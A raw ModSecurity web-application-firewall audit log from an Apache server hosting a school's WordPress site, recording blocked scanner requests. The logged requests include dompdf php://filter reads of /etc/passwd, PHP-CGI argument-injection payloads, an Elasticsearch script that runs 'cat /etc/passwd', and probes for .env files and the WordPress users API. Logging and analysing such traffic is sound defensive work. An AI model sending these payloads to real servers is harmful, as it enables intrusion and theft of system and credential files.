Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e34ce055-Z-- --6a4dd05e-A-- [31/May/2025:18:02:37 +0700] aDrhzeg1nD2n5twq7NuQpAAAAEU 103.236.140.4 46660 103.236.140.4 8181 --6a4dd05e-B-- GET /wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: */* Accept-Language: en --6a4dd05e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a4dd05e-E-- --6a4dd05e-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748689357459358 2354 (- - -) Stopwatch2: 1748689357459358 2354; combined=622, p1=388, p2=196, p3=0, p4=0, p5=37, sr=74, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a4dd05e-Z-- --f420a070-A-- [31/May/2025:18:02:37 +0700] aDrhzZ3Kgs4r2wz12c7o5wAAAAM 103.236.140.4 46646 103.236.140.4 8181 --f420a070-B-- POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close Content-Length: 34 User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded --f420a070-C-- --f420a070-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f420a070-E-- --f420a070-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input: -d allow_url_include=on -d auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1748689357454951 6961 (- - -) Stopwatch2: 1748689357454951 6961; combined=5049, p1=557, p2=4461, p3=0, p4=0, p5=30, sr=78, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f420a070-Z-- --3b4e7840-A-- [31/May/2025:18:02:37 +0700] aDrhzR_L2Rte6DjSjWZ8WwAAAIc 103.236.140.4 46664 103.236.140.4 8181 --3b4e7840-B-- GET /wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/122.0 Safari/537.36 Accept: */* Accept-Language: en --3b4e7840-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b4e7840-E-- --3b4e7840-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748689357459637 2395 (- - -) Stopwatch2: 1748689357459637 2395; combined=730, p1=552, p2=140, p3=0, p4=0, p5=37, sr=173, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b4e7840-Z-- --2f1c517a-A-- [31/May/2025:18:02:37 +0700] aDrhzeg1nD2n5twq7NuQpQAAAFc 103.236.140.4 46668 103.236.140.4 8181 --2f1c517a-B-- GET /wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1 Accept: */* Accept-Language: en --2f1c517a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f1c517a-E-- --2f1c517a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748689357460203 1972 (- - -) Stopwatch2: 1748689357460203 1972; combined=625, p1=472, p2=127, p3=0, p4=0, p5=26, sr=91, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f1c517a-Z-- --e2cba129-A-- [31/May/2025:18:02:37 +0700] aDrhzZ3Kgs4r2wz12c7o6QAAABI 103.236.140.4 46658 103.236.140.4 8181 --e2cba129-B-- GET /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0 Accept: */* Accept-Language: en --e2cba129-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2cba129-E-- --e2cba129-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748689357460203 2117 (- - -) Stopwatch2: 1748689357460203 2117; combined=595, p1=468, p2=100, p3=0, p4=0, p5=27, sr=86, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2cba129-Z-- --bfc9da26-A-- [31/May/2025:18:02:37 +0700] aDrhzR_L2Rte6DjSjWZ8XAAAAJA 103.236.140.4 46670 103.236.140.4 8181 --bfc9da26-B-- GET /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Accept: */* Accept-Language: en --bfc9da26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bfc9da26-E-- --bfc9da26-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748689357460555 1901 (- - -) Stopwatch2: 1748689357460555 1901; combined=520, p1=414, p2=85, p3=0, p4=0, p5=21, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bfc9da26-Z-- --75818876-A-- [31/May/2025:18:02:37 +0700] aDrhzZ3Kgs4r2wz12c7o6gAAABA 103.236.140.4 46666 103.236.140.4 8181 --75818876-B-- POST /_search?pretty HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close Content-Length: 369 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded --75818876-C-- { "size": 1, "query": { "filtered": { "query": { "match_all": { } } } }, "script_fields": { "command": { "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();" } } } --75818876-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75818876-E-- --75818876-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /_search?pretty"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748689357460609 2040 (- - -) Stopwatch2: 1748689357460609 2040; combined=612, p1=280, p2=309, p3=0, p4=0, p5=23, sr=52, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75818876-Z-- --62d6cc53-A-- [31/May/2025:18:02:37 +0700] aDrhzZ3Kgs4r2wz12c7o6wAAAA4 103.236.140.4 46672 103.236.140.4 8181 --62d6cc53-B-- GET /wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: WMS/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36 Accept: */* Accept-Language: en --62d6cc53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62d6cc53-E-- --62d6cc53-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748689357460920 1934 (- - -) Stopwatch2: 1748689357460920 1934; combined=501, p1=395, p2=82, p3=0, p4=0, p5=24, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62d6cc53-Z-- --b3a37873-A-- [31/May/2025:18:39:11 +0700] aDrqX53Kgs4r2wz12c71fgAAAAw 103.236.140.4 36566 103.236.140.4 8181 --b3a37873-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 31.56.56.147 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 31.56.56.147 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --b3a37873-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3a37873-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748691551924345 851 (- - -) Stopwatch2: 1748691551924345 851; combined=330, p1=290, p2=0, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3a37873-Z-- --63b0b97f-A-- [31/May/2025:18:41:10 +0700] aDrq1h_L2Rte6DjSjWaInAAAAJQ 103.236.140.4 38716 103.236.140.4 8181 --63b0b97f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.18.232.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.18.232.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --63b0b97f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63b0b97f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748691670073382 2897 (- - -) Stopwatch2: 1748691670073382 2897; combined=1333, p1=407, p2=880, p3=0, p4=0, p5=45, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63b0b97f-Z-- --c516541f-A-- [31/May/2025:19:19:54 +0700] aDrz6lbZTRMbIzLSWp72ogAAAMw 103.236.140.4 58804 103.236.140.4 8181 --c516541f-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --c516541f-C-- --c516541f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c516541f-E-- --c516541f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748693994596933 4048 (- - -) Stopwatch2: 1748693994596933 4048; combined=2560, p1=469, p2=2058, p3=0, p4=0, p5=33, sr=64, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c516541f-Z-- --a188f84f-A-- [31/May/2025:19:32:27 +0700] aDr22-g1nD2n5twq7NuqEAAAAEI 103.236.140.4 45934 103.236.140.4 8181 --a188f84f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 27.147.138.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 27.147.138.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a188f84f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a188f84f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748694747010002 2743 (- - -) Stopwatch2: 1748694747010002 2743; combined=1250, p1=427, p2=794, p3=0, p4=0, p5=29, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a188f84f-Z-- --88db383b-A-- [31/May/2025:20:05:38 +0700] aDr-oh_L2Rte6DjSjWah0QAAAJQ 103.236.140.4 58876 103.236.140.4 8181 --88db383b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --88db383b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88db383b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748696738422462 854 (- - -) Stopwatch2: 1748696738422462 854; combined=400, p1=357, p2=0, p3=0, p4=0, p5=43, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88db383b-Z-- --0a73f913-A-- [31/May/2025:20:33:37 +0700] aDsFMVbZTRMbIzLSWp4OfAAAAMo 103.236.140.4 59762 103.236.140.4 8181 --0a73f913-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 137.184.171.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 137.184.171.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --0a73f913-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a73f913-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748698417169468 745 (- - -) Stopwatch2: 1748698417169468 745; combined=307, p1=267, p2=0, p3=0, p4=0, p5=40, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a73f913-Z-- --a73dd233-A-- [31/May/2025:21:05:24 +0700] aDsMpJ3Kgs4r2wz12c4kHAAAABM 103.236.140.4 37428 103.236.140.4 8181 --a73dd233-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 123.200.15.226 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 123.200.15.226 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a73dd233-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a73dd233-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748700324283565 2679 (- - -) Stopwatch2: 1748700324283565 2679; combined=1239, p1=392, p2=815, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a73dd233-Z-- --8185180a-A-- [31/May/2025:21:36:12 +0700] aDsT3Og1nD2n5twq7NvIUwAAAEk 103.236.140.4 41946 103.236.140.4 8181 --8185180a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 162.240.226.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 162.240.226.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8185180a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8185180a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
